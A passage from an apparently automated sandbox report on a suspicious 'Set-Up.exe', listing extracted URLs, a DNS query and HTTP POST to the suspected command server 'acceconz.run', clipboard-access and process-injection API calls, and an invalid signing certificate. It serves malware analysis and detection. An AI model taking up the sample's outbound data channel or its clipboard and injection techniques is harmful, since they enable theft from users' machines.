ibi.comamfibi.comAmfibiwww.websearch.comwebsearch.comwebsearchwww.picsearch.comPicsearchsearch.seznam.czSeznamnova.rambler.ruRamblerwww.similarsitesearch.comSimilarsitesearchblekko.comBlekkowww.sogou.comsogou.comquerySogouwww.shutterstock.comshutterstock.com/cat.mhtmlsearchtermShutterstocksearch.webssearches.comwebssearches.comWebssearcheswww.chinaso.comchinaso.comChinasowww.fotolia.comfotolia.comkFotoliawww.findamo.comfindamo.comFindamopicasaweb.google.comPicasamedia.photobucket.comphotobucket.comwww.photobucket.comPhotobucketTuvarutwitter.comwww.twitter.comTwittervube.comwww.vube.comVubevideo.so.comimage.so.comso.comwww.so.comSosoku.comwww.soku.com/vkeywordSokusearch.naver.jpsearch.naver.comwww.naver.jpNavertopsy.comwww.topsy.comTopsygovome.comwww.govome.comGovomesearch.globososo.comglobososo.comwww.globososo.com/webGlobososointernet.comwww.internet.com/listings/Internetwow.comwww.wow.comWowtuvaro.comwww.tuvaro.com/ws/Tuvaromysearchresults.comwww.mysearchresults.com/search.phpMysearchresultsbing.comwww.bing.comstrictadlt/searchBingim
Source: Set-Up.exe	String found in binary or memory: www.twitter.com equals www.twitter.com (Twitter)
Source: Set-Up.exe	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)

Source: global traffic

DNS traffic detected: DNS query: acceconz.run

Source: unknown

HTTP traffic detected: POST /oxap HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: acceconz.run

Source: Set-Up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Set-Up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Set-Up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Set-Up.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Set-Up.exe, 00000003.00000003.1563242115.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1469745938.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1540753953.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1536386695.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1579971856.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1536539632.0000000000A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Set-Up.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Set-Up.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Set-Up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Set-Up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Set-Up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Set-Up.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Set-Up.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Set-Up.exe	String found in binary or memory: http://https://?//?#//#/..////rbCOperationsManager::EncryptFile
Source: Set-Up.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Set-Up.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Set-Up.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Set-Up.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Set-Up.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: Set-Up.exe	String found in binary or memory: http://www.google.com
Source: Set-Up.exe	String found in binary or memory: http://www.google.comCLocalClientParentalControl::DataBeforeReceive
Source: Set-Up.exe	String found in binary or memory: http://www.google.comconnection:
Source: Set-Up.exe	String found in binary or memory: http://www.google.comwebsocketupgradeddisablehttp://www.google.com
Source: Set-Up.exe	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: Set-Up.exe	String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Set-Up.exe, 00000003.00000003.1502963944.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580070341.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acceconz.run/
Source: Set-Up.exe, 00000003.00000003.1536418380.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1536345262.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acceconz.run/)
Source: Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1540684928.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580070341.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1563211342.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acceconz.run/1
Source: Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1540684928.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580070341.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1563211342.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acceconz.run/19:
Source: Set-Up.exe, 00000003.00000003.1563211342.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1540684928.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acceconz.run/oxap
Source: Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580070341.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acceconz.run/oxap47
Source: Set-Up.exe, 00000003.00000003.1536345262.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acceconz.run/oxapal
Source: Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1540684928.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1580070341.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1563211342.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acceconz.run/t
Source: Set-Up.exe, 00000003.00000003.1574036111.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1540684928.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acceconz.run:443/oxap
Source: Set-Up.exe, 00000003.00000003.1515226738.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1515286974.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acceconz.run:443/oxaphcon
Source: Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: Set-Up.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: Set-Up.exe, 00000003.00000003.1504681437.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Set-Up.exe, 00000003.00000003.1504681437.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Set-Up.exe, 00000003.00000003.1505203011.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: Set-Up.exe	String found in binary or memory: https://www.bitvise.com/0
Source: Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Set-Up.exe, 00000003.00000003.1475786396.0000000003878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Set-Up.exe, 00000003.00000003.1504681437.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Set-Up.exe, 00000003.00000003.1504681437.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Set-Up.exe, 00000003.00000003.1504681437.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Set-Up.exe, 00000003.00000003.1504681437.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Set-Up.exe, 00000003.00000003.1504681437.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Set-Up.exe, 00000003.00000003.1504681437.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_3_02A7EBC0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

3_3_02A7EBC0

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_3_02A7EBC0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

3_3_02A7EBC0

Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_009E10E8 NtTerminateThread,	3_3_009E10E8
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_009E0B72 NtGetContextThread,NtSetContextThread,NtResumeThread,	3_3_009E0B72
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_009E0CD8 NtAllocateVirtualMemory,NtFreeVirtualMemory,	3_3_009E0CD8
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_009E066E NtProtectVirtualMemory,	3_3_009E066E

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_00403AC1: _memset,_sprintf,CreateFileA,DeviceIoControl,CloseHandle,

3_2_00403AC1

Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A6FAE0	3_3_02A6FAE0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A4DBF0	3_3_02A4DBF0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A43B05	3_3_02A43B05
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A68870	3_3_02A68870
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5DEA5	3_3_02A5DEA5
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A51EB6	3_3_02A51EB6
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A84680	3_3_02A84680
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A537B3	3_3_02A537B3
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A4B720	3_3_02A4B720
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A8EF70	3_3_02A8EF70
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A51748	3_3_02A51748
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A8FCB0	3_3_02A8FCB0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A88430	3_3_02A88430
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A51C1A	3_3_02A51C1A
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A605B0	3_3_02A605B0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A54D44	3_3_02A54D44
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A662A0	3_3_02A662A0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A4CAC0	3_3_02A4CAC0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A55A29	3_3_02A55A29
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A64A28	3_3_02A64A28
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A69230	3_3_02A69230
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A4FA00	3_3_02A4FA00
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A51A7C	3_3_02A51A7C
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A8D250	3_3_02A8D250
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A4C3E0	3_3_02A4C3E0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A6EBE0	3_3_02A6EBE0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A89BD0	3_3_02A89BD0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A67B20	3_3_02A67B20
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A4B300	3_3_02A4B300
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A48B60	3_3_02A48B60
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A75360	3_3_02A75360
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5236D	3_3_02A5236D
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A50B40	3_3_02A50B40
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A83B50	3_3_02A83B50
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A6F080	3_3_02A6F080
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5B094	3_3_02A5B094
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A490E0	3_3_02A490E0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A8C8E0	3_3_02A8C8E0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A4A8C0	3_3_02A4A8C0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A638CD	3_3_02A638CD
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A4C010	3_3_02A4C010
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A8A810	3_3_02A8A810
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A69840	3_3_02A69840
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A8F850	3_3_02A8F850
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A739C0	3_3_02A739C0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A479D0	3_3_02A479D0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A8E920	3_3_02A8E920
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A85910	3_3_02A85910
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5D16C	3_3_02A5D16C
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A62969	3_3_02A62969
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A65170	3_3_02A65170
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A43150	3_3_02A43150
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5FEA6	3_3_02A5FEA6
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5A6B2	3_3_02A5A6B2
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A486F0	3_3_02A486F0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A49EC0	3_3_02A49EC0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A8C620	3_3_02A8C620
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A55E00	3_3_02A55E00
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A41FA0	3_3_02A41FA0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A787E0	3_3_02A787E0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A657CD	3_3_02A657CD
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A59F05	3_3_02A59F05
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A52F00	3_3_02A52F00
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A62F08	3_3_02A62F08
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A53F4E	3_3_02A53F4E
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A8F4A0	3_3_02A8F4A0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A63C80	3_3_02A63C80
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5BCE0	3_3_02A5BCE0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A894F0	3_3_02A894F0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A65CD0	3_3_02A65CD0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A8CCD0	3_3_02A8CCD0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A7C5A0	3_3_02A7C5A0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5F599	3_3_02A5F599
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A4BDE0	3_3_02A4BDE0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A55500	3_3_02A55500
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00588870	3_2_00588870
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_004030BC	3_2_004030BC
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00588220	3_2_00588220
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_006C8600	3_2_006C8600
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_004030BC	3_2_004030BC
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_005D06A0	3_2_005D06A0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_005C0A68	3_2_005C0A68
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00404CF5	3_2_00404CF5
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00588AE8	3_2_00588AE8
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00401983	3_2_00401983
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_005D0B00	3_2_005D0B00
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_005B8BF6	3_2_005B8BF6
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_006C8B90	3_2_006C8B90
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00478F70	3_2_00478F70
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_004030D0	3_2_004030D0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_004055D3	3_2_004055D3
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00403B8E	3_2_00403B8E
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00404D4F	3_2_00404D4F
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00402BA8	3_2_00402BA8
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00691500	3_2_00691500
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_005E9730	3_2_005E9730
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00431A40	3_2_00431A40
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00691A70	3_2_00691A70
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00404E6C	3_2_00404E6C
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_005C9C0C	3_2_005C9C0C
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_005D1E00	3_2_005D1E00
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_005A9FFD	3_2_005A9FFD
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00403C97	3_2_00403C97
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_0040534E	3_2_0040534E
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_005D2440	3_2_005D2440
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00401C53	3_2_00401C53
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_006926B0	3_2_006926B0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00401AA5	3_2_00401AA5

Source: C:\Users\user\Desktop\Set-Up.exe	Code function: String function: 00403D0F appears 91 times
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: String function: 0059BF30 appears 38 times
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: String function: 0059B142 appears 48 times
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: String function: 02A4B190 appears 61 times
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: String function: 00406E42 appears 122 times

Source: Set-Up.exe

Static PE information: invalid certificate

Source: Set-Up.exe	Binary or memory string: \StringFileInfo\%04x%04x\OriginalFilename vs Set-Up.exe
Source: Set-Up.exe, 00000003.00000000.1279469845.000000000085D000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilename vs Set-Up.exe
